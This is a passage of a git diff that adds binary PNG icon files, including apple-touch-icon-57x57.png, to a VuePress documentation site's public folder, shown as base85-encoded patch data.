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
a`u_paUpt19(7^8i0000<MNUMnLSTZ(?}#Y?

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png b/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png
new file mode 100644
index 0000000000000000000000000000000000000000..7bf1a37dc59b21f8b7c4cb0bb5e8ae0c8c0db516
GIT binary patch
literal 3622
zcmV+>4%zXEP)<h;3K|Lk000e1NJLTq0021v0021%1^@s6j2MH300009a7bBm000ie
z000ie0hKEb8vp<e*hxe|RA_<Kn`?|5)s@G8=T>!3cTdm5U>h53<Hy)D#7mZ4SdbtK
z39<wz*~M7`2*?Hrt&~WS7DeMPD?YFGOGZgPL<-W%D<VjMm4ZXU8i<!i*0Ms@b{s^^
zj2R|lGah^VnDNYXPrs__?1!rAuCA``9>YqzIZ{pC$GPX8|2^m4bMLJlp_L5a1@9<%
zkvbCU0T`Q5K)0&Oog&<dGJ>!bSP$fZG*AT!zy*|PU|iuC!V!V#(P4@A71b@O&#KBL
z0bIOcyrTqQo&mW<mB$43A`Ahb0fQu^HP(H-ZW1_v@Keweqr;|a|J_JvW0BR+*ti-+
z9|682BDW>+BtS{5PvTS6qrmqBULGC!^k6&n-`0|2<DNleFUr3t>`D|GXdVTT)NvBX
zxX}epA^a0?AaLcYqHZ8t0Z!<4Rh|`LPggUA8VlIsC*3&Okf)P2feckWB=F7A5i`}L
z*Ctvu$gv4EpkG(`AxgfJ&>jnN78D&wTd+0_8#BJHGbNa>!isY>YBp(H0KSd#{JvGX
z@T%tI*o0?;`~dhCw7QlAiJT4nDY!8QBB0vfi)y0^A1p!1Z7vf@NCOh-Fp~U{Do^hl
zk*>ql)so*G_wpk0@2Yx#Cqe6aU?}fP6a<Y;$d3wex!T-DlU(;INJL&&)ra?um_kRs
zPL*ThULKLxRQ2v|9cC;@*L|XOsi}HUcH^x+JBi4z75(zQ;r2k=g8c5dmllzq`xcC@
zf1TFJcKKwJSppj}pa^qituIPx14f|YfofuqZR%fy*A;zm->`}KN(Yc*6KWLwp{RUI
